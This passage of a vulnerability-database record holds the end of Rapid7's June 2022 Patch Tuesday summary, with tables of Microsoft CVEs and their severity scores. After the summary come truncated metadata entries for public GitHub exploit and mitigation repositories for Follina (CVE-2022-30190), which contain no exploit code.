Again, even if the mitigation has been put into place, best to patch sooner rather than later.\n\nAlso reminiscent of last month is [CVE-2022-30139](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30139>), a critical RCE in LDAP carrying a CVSSv3 base score of 7.1, which again is only exploitable if the MaxReceiveBuffer LDAP policy value is set higher than the default. Rounding out the critical RCEs for June is [CVE-2022-30163](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30163>), which could allow a malicious application running on a Hyper-V guest to execute code on the host OS.\n\nThe other big news this month is the end of support for Internet Explorer 11 (IE11) on Windows 10 Semi-Annual Channels and Windows 10 IoT Semi-Annual Channels, as Microsoft encourages users to adopt the Chromium-based Edge browser (which saw fixes for 5 CVEs this month). Internet Explorer 11 on other versions of Windows should continue receiving security updates and technical support based on the OS support lifecycle, so this is only the beginning of the end for the legacy browser.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Apps vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30168>) | Microsoft Photos App Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-30137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30137>) | Azure Service Fabric Container Elevation of Privilege Vulnerability | No | No | 6.7 | Yes \n[CVE-2022-30177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30177>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30178>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30179>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30180>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 7.8 | Yes \n \n### Azure System Center vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29149>) | Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Browser vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-22021](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22021>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-2011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2011>) | Chromium: CVE-2022-2011 Use after free in ANGLE | No | No | N/A | Yes \n[CVE-2022-2010](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2010>) | Chromium: CVE-2022-2010 Out of bounds read in compositing | No | No | N/A | Yes \n[CVE-2022-2008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2008>) | Chromium: CVE-2022-2008 Out of bounds memory access in WebGL | No | No | N/A | Yes \n[CVE-2022-2007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2007>) | Chromium: CVE-2022-2007 Use after free in WebGPU | No | No | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30184>) | .NET and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-30140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30140>) | Windows iSCSI Discovery Service Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-30152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30152>) | Windows Network Address Translation (NAT) Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-30135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30135>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30153>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30161>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30141>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-30143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30143>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30149>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30146>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes 
\n[CVE-2022-30155](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30155>) | Windows Kernel Denial of Service Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30147>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30163>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes \n[CVE-2022-30142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30142>) | Windows File History Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-30151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30151>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-30160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30160>) | Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30166>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21166>) | Intel: CVE-2022-21166 Device Register Partial Write (DRPW) | No | No | N/A | Yes \n[CVE-2022-21127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21127>) | Intel: CVE-2022-21127 Special Register Buffer Data Sampling Update (SRBDS Update) | No | No | N/A | Yes \n[CVE-2022-21125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21125>) | Intel: CVE-2022-21125 Shared Buffers Data Sampling (SBDS) | No | No | N/A | Yes 
\n[CVE-2022-21123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21123>) | Intel: CVE-2022-21123 Shared Buffers Data Read (SBDR) | No | No | N/A | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30157](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30157>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30158>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30174>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.4 | Yes \n[CVE-2022-30159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30159>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30171>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30172>) | Microsoft Office Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30173>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### SQL Server vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-29143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29143>) | Microsoft SQL Server Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-32230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-32230>) | Windows SMB Denial of Service Vulnerability | No | No | N/A | Yes \n[CVE-2022-30136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30136>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-30139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30139>) | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30162>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30165>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-30145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30145>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-30148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30148>) | Windows Desired State Configuration (DSC) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-30150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30150>) | Windows Defender Remote Credential Guard Elevation of Privilege Vulnerability | No | No | 7.5 | Yes 
\n[CVE-2022-30132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30132>) | Windows Container Manager Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30131>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-30189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30189>) | Windows Autopilot Device Management and Enrollment Client Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-30154](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30154>) | Microsoft File Server Shadow Copy Agent Service (RVSS) Elevation of Privilege Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-30164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30164>) | Kerberos AppContainer Security Feature Bypass Vulnerability | No | No | 8.4 | Yes \n[CVE-2022-29111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29111>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22018>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30188>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29119>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30167>) | AV1 Video Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes 
\n[CVE-2022-30193](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30193>) | AV1 Video Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n\n_**Additional reading:**_\n\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>) \n_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T19:37:50", "type": "rapid7blog", "title": "Patch Tuesday - June 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2007", "CVE-2022-2008", "CVE-2022-2010", "CVE-2022-2011", "CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-22018", "CVE-2022-22021", "CVE-2022-26937", "CVE-2022-29111", "CVE-2022-29119", "CVE-2022-29143", "CVE-2022-29149", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30137", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30157", "CVE-2022-30158", "CVE-2022-30159", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30167", "CVE-2022-30168", "CVE-2022-30171", "CVE-2022-30172", "CVE-2022-30173", "CVE-2022-30174", "CVE-2022-30177", "CVE-2022-30178", "CVE-2022-30179", "CVE-2022-30180", "CVE-2022-30184", "CVE-2022-30188", "CVE-2022-30189", "CVE-2022-30190", "CVE-2022-30193", "CVE-2022-32230"], "modified": "2022-06-14T19:37:50", "id": "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "href": "https://blog.rapid7.com/2022/06/14/patch-tuesday-june-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-10-01T20:48:17", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-02T12:17:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-29T08:17:18", "id": "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-21T12:08:07", "description": "# CVE-2022-30190 (Follina)\n\n\n\n## Description\nThese two ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:20:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-08T14:29:37", "id": "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:00:46", "description": "# CVE-2022-30190(Follina)-PowerPoint-Version\n\nThis is CVE-2022-3...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-31T12:50:35", "id": "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-18T00:00:17", "description": "# Follina MS-MSDT exploitation with Spring Boot\n\nThis repository...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T22:46:23", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-17T23:25:27", "id": "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:06:54", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-18T01:41:15", "id": "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-12T15:34:28", "description": "# CVE-2022-30190 - Microsoft Support Diagnostic Tool\n\n## About\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T10:07:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-12T14:58:34", "id": "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, 
{"lastseen": "2022-10-06T15:50:39", "description": "<h1 align='center'><b> Follina-attack-CVE-2022-30190-</b></h1><b...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-06T11:41:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-06T15:42:31", "id": "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-20T16:39:31", "description": "# Follina-MSDT-Vulnerability-CVE-2022-30190-\nDetection and Remed...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-21T06:49:44", "type": "githubexploit", 
"title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-20T14:40:32", "id": "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-09T17:09:28", "description": "# mitigate-folina\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 